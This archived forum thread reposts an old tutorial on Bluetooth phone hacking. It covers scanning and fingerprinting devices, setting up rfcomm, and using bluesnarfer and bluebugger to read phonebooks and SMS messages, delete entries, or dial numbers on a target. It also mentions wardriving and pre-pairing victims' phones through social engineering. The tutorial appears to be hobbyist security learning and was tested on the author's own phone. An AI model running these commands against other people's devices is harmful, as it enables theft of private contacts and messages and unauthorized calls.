Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

  1. #1
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Dr_GrEeN's Bluetooth Guides From old fourm.

    Okay, I dug this out of the wayback machine. This was a couple posts by Dr_GrEeN on the old forum. We Shouldn't loose this stuff.

    Quote Originally Posted by Dr_GrEen
    Part1
    Hey Guys

    Just thought I'd post a little on Bluetooth Hacking because I can see thereis a lot of questions and not alot of answers So here's how I hacked my samsung d600.

    First I poped to my local supermarket and picked myself up a bluetooth dongle for 6.99!!!! Because my shitieToshiba Satellite P100 doesn't have bluetooth

    Ok first lets configure BT.................

    Type :

    bt ~ # mkdir -p /dev/bluetooth/rfcomm
    mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    Thats Bluesnarfer done, now for bluebugger.............

    Type:

    bt ~ # mknod --mode=666 /dev/rfcomm0 c 216 0

    Ok now we can fire up are Bluetooth adaptor, so type:

    bt ~ # hciconfig hci0 up

    Now are bluetooth adaptor should be ready, check by typing :

    bt ~ # hciconfig hci0

    and you should see somthing like this:

    hci0: Type: USB
    BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
    UP RUNNING
    RX bytes:85 acl:0 sco:0 events:9 errors:0
    TX bytes:33 acl:0 sco:0 commands:9 errors:0

    Ok now we are ready to scan so type:

    bt ~ # hcitool scan hci0

    And you should see all the devices in the area. You can also use btscanner and btscanner has a bruteforce scanner for discovering hidden devices.

    Now note the name and MAC of the target and let's move on.

    First thing lets try to ping are target. Type:

    l2ping <target MAC>

    If you dont get a ping GOOD LUCK

    Next we need to find out a little about the device we want to hack so lets fire up blueprint.

    And type:

    sdptools browse --tree --l2cap <target MAC>

    And you should get somthing like this:

    Code:
    Browsing 00:16:DB:A1:B6:B9 ...
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10000
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID128 : 0xdb1d8f12-95f3-402c-9b97-bc504c9a-55c4
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x1
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x6 - LanguageBaseAttributeIDList
      Data Sequence
        Code ISO639 (Integer) : 0x656e
        Encoding (Integer) : 0x6a
        Base Offset (Integer) : 0x100
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID128 : 0x1cdb1d8f-1295-f340-2c9b-97bc504c-9a55
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 57 42 54 45 58 54 00 00
    Attribute Identifier : 0x8003
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10001
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1101 - SerialPort
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x2
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1101 - SerialPort
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 53 65 72 69 61 6c 20 50 6f 72 74 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10002
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1103 - DialupNetworking (DUN)
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x3
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1103 - DialupNetworking (DUN)
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 44 69 61 6c 2d 75 70 20 4e 65 74 77 6f 72 6b 69 6e 67 00 00
    Attribute Identifier : 0x305
      Integer : 0x0
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10003
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1112 - HeadsetAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x4
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1108 - Headset
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10004
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x111f - HandsfreeAudioGateway
        UUID16 : 0x1203 - GenericAudio
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x5
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x111e - Handsfree
          Version (Integer) : 0x101
    Attribute Identifier : 0x100
      Data : 56 6f 69 63 65 20 47 57 00 00
    Attribute Identifier : 0x301
      Integer : 0x1
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10005
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110a - AudioSource
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x19
        Data Sequence
          UUID16 : 0x0019 - AVDTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110d - AdvancedAudio
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 41 64 76 61 6e 63 65 64 20 61 75 64 69 6f 20 73 6f 75 72 63 65  00 00
    Attribute Identifier : 0x311
      Integer : 0x1
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10006
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x110c - RemoteControlTarget
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
          Channel/Port (Integer) : 0x17
        Data Sequence
          UUID16 : 0x0017 - AVCTP
          Channel/Port (Integer) : 0x100
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x110e - RemoteControl
          Version (Integer) : 0x100
    Attribute Identifier : 0x311
      Integer : 0x100
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10007
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1106 - OBEXFileTransfer
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x6
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1106 - OBEXFileTransfer
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 42 45 58 20 46 69 6c 65 20 54 72 61 6e 73 66 65 72 00 00
    
    Attribute Identifier : 0x0 - ServiceRecordHandle
      Integer : 0x10008
    Attribute Identifier : 0x1 - ServiceClassIDList
      Data Sequence
        UUID16 : 0x1105 - OBEXObjectPush
    Attribute Identifier : 0x4 - ProtocolDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x0100 - L2CAP
        Data Sequence
          UUID16 : 0x0003 - RFCOMM
          Channel/Port (Integer) : 0x7
        Data Sequence
          UUID16 : 0x0008 - OBEX
    Attribute Identifier : 0x5 - BrowseGroupList
      Data Sequence
        UUID16 : 0x1002 - PublicBrowseGroup
    Attribute Identifier : 0x9 - BluetoothProfileDescriptorList
      Data Sequence
        Data Sequence
          UUID16 : 0x1105 - OBEXObjectPush
          Version (Integer) : 0x100
    Attribute Identifier : 0x100
      Data : 4f 62 6a 65 63 74 20 50 75 73 68 00 00
    Attribute Identifier : 0x303
      Data Sequence
        Integer : 0x1
        Integer : 0x3
        Integer : 0x5
        Integer : 0xff
    Now if you asked me what does this mean I wouldn't know, but I think it tells you abit about the channels and what services are running on what channel.

    Anyway after playing abit I found that my D600 uses channel 7 for phonebook lookup etc. I think every make and model is diffrent so you might have to try a few until you get the right one. Like I said im only just getting to grips with linux So if anybodu knows anymore I'd love to read about it.

    End Part 1
    Last edited by Barry; 03-27-2010 at 03:18 AM.

  2. #2
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Re: Dr_GrEeN's Bluetooth Guides From old fourm.

    Here's part 2 of his post.

    Quote Originally Posted by Dr_GrEeN

    Part 2

    Ok lets get to it ...... Start a shell and lets take a look at bluesnarfer's options so type:

    bt ~ # bluesnarfer

    And you should get :
    Code:
    bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION)
    
    TYPE      : valid phonebook type ..
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr : bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info
    Ok so now we have some options lets begin type:

    bluesnarfer [options] -C 7 -b <taget MAC>

    for eg: bluesnarfer -r 1-100 -C 7 -b 00:11:22:33:44:55

    And the hack should start ........

    Now bluebugger Type:

    Bluebugger -h

    And you should get :
    Code:
    bluebugger 0.1 (cant post urls :D)
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE]
    
           -a <addr>     = Bluetooth address of target
    
           Options:
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup (default: 5)
           -o <file>     = Write output to <file>
    
           Mode:
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'
    Again now we have are options lets hack .............. Type:

    bluebugger [OPTIONS] -c 7 -a <target MAC> [MODE]

    for eg: bluebugger -m Dr_GrEeN -c 7 -a 00:11:22:33:44:55 dial 0845GAYPORN

    And again you should see some results.

    The only downside to hacking into my D600 is that you still have to allow it on the phone so its not exactly HACKING the D600 but its a good training session. And now you can go forth and play.

    Hope you lot can understand my bad spelling ETC and have fun

    PS : Can sombody swap these posts around? Sorry my fault and oh yea RFCOMM Connection refused error is normally wrong channel. If after using bluebugger you get operation already in progress error type:

    hciconfig hci0 down
    hciconfig hci0 reset
    hciconfig hci0 up

    And all should be well.
    Last edited by Barry; 03-27-2010 at 03:18 AM.

  3. #3
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    The "One Bluetooth post to rule them all!!" post.

    Quote Originally Posted by Dr_GrEen
    Backtrack Ultimate Bluetooth Tutorial

    Hey all

    After I received lots of mail and requests I decided to shed some more light on bluetooth. In this tutorial I am going to be covering the following subjects...

    1) Setting up your bluetooth equipment
    2) Scanning and fingerprinting devices
    3) Connectivity and RFCOMM
    4) Bluebugging & Bluesnarfing

    And as a merry Christmas to all at remote exploits

    5) Making bluetooth sniffing hardware for $39.99

    Video tutorials on different subjects will be added to this post over the next week.

    OK lets begin the first subject might sound silly to most here but for the guys that just don't know I'm going to cover it anyway. To setup your bluetooth USB device simply plug it in and wait for 10 sec's. Then type in console

    Code:
    hciconfig hci0 up
    And you should have your adapter up and working, you can test with the following command .....


    Code:
    hciconfig -a
    And you should see something like the following .


    Code:
    hci0:   Type: USB
            BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
            UP RUNNING
            RX bytes:85 acl:0 sco:0 events:9 errors:0
            TX bytes:33 acl:0 sco:0 commands:9 errors:0
            Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
            Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
            Link policy:
            Link mode: SLAVE ACCEPT
            Name: 'ISSCBTA'
            Class: 0x000000
            Service Classes: Unspecified
            Device Class: Miscellaneous,
            HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
            Manufacturer: Integrated System Solution Corp. (57)
    Ok if you are stuck at this point I would suggest you go out and buy a compatible USB dongle for backtrack But if you are still with me lets move on.

    Next is fingerprinting a bluetooth device. Fingerprinting is a term we use for profiling a device, and to do this backtrack has a collection of tools called bluez. Bluez is like the standard bluetooth package for linux. For fingerprinting we can use a couple of those tools. One is hcitool, we can use hcitool to scan for devices that are broadcasting. We scan with hcitool with the following command.

    Code:
    hcitool scan hci0
    And you should see something like ...


    Code:
    Scanning ...
            00:11:22:33:44:55       hackme
    You can also brute force scan for devices, backtrack also has you covered on this with a wonderful tool called btscanner. Btscanner can also inquiry scan You would use btscanner in a inquiry scan if you were wardriving.

    The other is Sdptool, sdptool will browse our device for open channels and tell us what services are available on what channels.

    We fingerprint devices with sdptool by issuing the following command


    Code:
    sdptool browse victim_Mac
    And you should see something like this .........


    Code:
    Service Name: Serial Port
    Service RecHandle: 0x10001
    Service Class ID List:
      "Serial Port" (0x1101)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 2
    Profile Descriptor List:
      "Serial Port" (0x1101)
        Version: 0x0100
    
    Service Name: Dial-up Networking 
    Service RecHandle: 0x10002
    Service Class ID List:
      "Dialup Networking" (0x1103)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 3
    Profile Descriptor List:
      "Dialup Networking" (0x1103)
        Version: 0x0100
    
    Service Name: OBEX File Transfer 
    Service RecHandle: 0x10007
    Service Class ID List:
      "OBEX File Transfer" (0x1106)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 6
      "OBEX" (0x0008)
    Profile Descriptor List:
      "OBEX File Transfer" (0x1106)
        Version: 0x0100
    
    Service Name: Object Push 
    Service RecHandle: 0x10008
    Service Class ID List:
      "OBEX Object Push" (0x1105)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 7
      "OBEX" (0x0008)
    Profile Descriptor List:
      "OBEX Object Push" (0x1105)
        Version: 0x0100
    Lets take a look at what we have, on two we have a serial port/channel on three we have dial up on 6 we have OBEX ftp and on 7 we have OPUSH.

    All are interesting And no we have a pretty good idea about what the device is and so on.

    Now on to the bit most people I speak to struggle with the dreaded RFCOMM :O. RFCOMM is a simple set of transport protocols, made on top of the L2CAP protocol, providing emulated RS-232 serial port. or in lamens terms they provide the language your device and laptop need to talk to each other.

    Now the first thing to do is to setup our bluetooth configuration so lets go over to the /etc dir and get stuck in.

    open /etc/bluetooth/hcid.conf and replace the lot with this

    Code:
         #
    # HCI daemon configuration file.
    #
    
    # HCId options 
    options {
        # Automatically initialize new devices
        autoinit yes;
    
         # Security Manager mode
        #   none - Security manager disabled
        #   auto - Use local PIN for incoming connections
        #   user - Always ask user for a PIN
        #
        security auto;
    
         # Pairing mode
        #   none  - Pairing disabled
        #   multi - Allow pairing with already paired devices
        #   once  - Pair once and deny successive attempts
        pairing multi;
    
         # Default PIN code for incoming connections
        passkey "1234";
    }
    
    # Default settings for HCI devices 
    device {
        # Local device name
        #   %d - device id
        #   %h - host name
        name "device1";
    
         # Local device class
        class 0x000000;
    
         # Default packet type
        #pkt_type DH1,DM1,HV1;
    
         # Inquiry and Page scan
        iscan enable; pscan enable;
    
         # Default link mode
        #   none   - no specific policy 
        #   accept - always accept incoming connections
        #   master - become master on incoming connections,
        #            deny role switch on outgoing connections
        lm accept,master;
    
         # Default link policy
        #   none    - no specific policy
        #   rswitch - allow role switch
        #   hold    - allow hold mode
        #   sniff   - allow sniff mode
        #   park    - allow park mode
        lp rswitch,hold,sniff,park;
        auth enable;
        encrypt enable;
    }
    You can setup your own passkey and name, also go over to a shell and type


    Code:
    hciconfig -a
    And copy the class to hcid.conf, save and exit. You could setup rfcomm here to but its a live cd.

    Now restart your bluetooth device like so

    Code:
         bash /etc/rc.d/rc.bluetooth restart
    And now we can setup our rfcomm binds, I will post a bash script when I have time but for now you will have to do it the manual way .

    First thing is to setup our devices .....


    Code:
    mknod -m 666 /dev/rfcomm0 c 216 3
    mknod -m 666 /dev/rfcomm1 c 216 6
    mknod -m 666 /dev/rfcomm2 c 216 7
    Ok what we did there is create three binds to our bluetooth device. First one is RFCOMM0 and is on channel 3 DUN Dial up, Second is RFCOMM1 and is on channel 6 FTP and the third is RFCOMM2 and is on channel 7 OBEX push.

    Now lets connect it all up with sdptool.

    Code:
         sdptool add --channel=3 DUN
    sdptool add --channel=6 FTP
    sdptool add --channel=7 OPUSH
    Now we have setup our bluetooth dongle correctly we can begin hacking
    end part 1
    Last edited by Barry; 03-27-2010 at 03:30 AM.

  4. #4
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    The "One bluetooth post to rule them all!!" post, part 2.
    Quote Originally Posted by Dr_GrEeN
    If I were to talk you though every possible exploit there is for bluetooth it would take all next year and I still wouldn't be finished so the two hack are going to be bluesnarfer and bluebugger.

    Bluesnarfer connects to a target Bluetooth device via Bluetooth's OBEX Push profile. But instead of pushing a business card, it pulls, using a "get" request for files with known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs), Bluebugger works in a similar way.
    Also bear in mind that these security flaws can still be used against you. With a little bit of social engineering you could pre pair a phone to your laptop and exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugger successfully completing a hack on my samsung d600.

    Both are pretty strait forward to use now you have your bluetooth setup correctly. I'm not going to post commands because their is a video on the way. First bluebugger....

    Code:
         bluebugger 0.1 ( MaJoMu | back to basics. )
    -----------------------------------------
    
    Usage: bluebugger [OPTIONS] -a <addr> [MODE] 
    
           -a <addr>     =  Bluetooth address of target
    
           Options: 
           --------
           -m <name>     = Name to use when connecting (default: '')
           -d <device>   = Device to use (default: '/dev/rfcomm')
           -c <channel>  = Channelto use (default: 17)
           -n            = No device name lookup
           -t <timeout>  = Timeout in seconds for name lookup  (default: 5)
           -o <file>     = Write output to <file>
    
           Mode: 
           -----
           info                   = Read Phone Info   (default)
           phonebook              = Read Phonebook    (default)
           messages               = Read SMS Messages (default)
           dial <num>             = Dial number
           ATCMD                  = Custom Command (e.g. '+GMI')
    
           Note: Modes can be combined, e.g. 'info phonebook +GMI'
    And Bluesnarfer ......


    Code:
         bluesnarfer, version 0.1 -
    usage: bluesnarfer [options] [ATCMD] -b bt_addr
    
    ATCMD     : valid AT+CMD (GSM EXTENSION) 
    
    TYPE      : valid phonebook type .. 
    example   : "DC" (dialed call list)
                "SM" (SIM phonebook)
                "RC" (recevied call list)
                "XX" much more
    
    -b bdaddr :  bluetooth device address
    -C chan   : bluetooth rfcomm channel
    
    -c ATCMD  : custom action 
    -r N-M    : read phonebook entry N to M
    -w N-M    : delete phonebook entry N to M
    -f name   : search "name" in phonebook address
    -s TYPE   : select phonebook memory storage
    -l        : list aviable phonebook memory storage
    -i        : device info
    Now for the finally how to turn an ordinary USB bluetooth dongle into a $1000 dollar sniffing tool

  5. #5
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    Thanks Barry.

  6. #6
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    No problem. I don't think he's registered here now. Most of the how-to's were written for BT2 and BT3, but for the most part they work with BT4. Does anybody have the old forum on disk anywhere?

  7. #7
    Developer muts's Avatar
    Join Date
    Jan 2006
    Posts
    272

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    Old forums temp. back online and planned to be dumped here in a "archive" forum... 2-3 days i hope.

  8. #8
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    Thats good news, there is a lot of good stuff there that really shouldnt be lost.

  9. #9
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    Quote Originally Posted by muts View Post
    Old forums temp. back online and planned to be dumped here in a "archive" forum... 2-3 days i hope.
    Sweet! Good to know, thanks Muts!

  10. #10
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default Re: Dr_GrEeN's Bluesnarfer & Bluebugger Guides From old fourm.

    Hey guys,

    Just to let you know I'm still about lurking in the background . Hope you guys are all well ?

Page 1 of 2 12 LastLast

Similar Threads

  1. Are there any guides for the tools in BackTrack ?
    By halfdone in forum Beginners Forum
    Replies: 8
    Last Post: 02-10-2010, 01:14 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •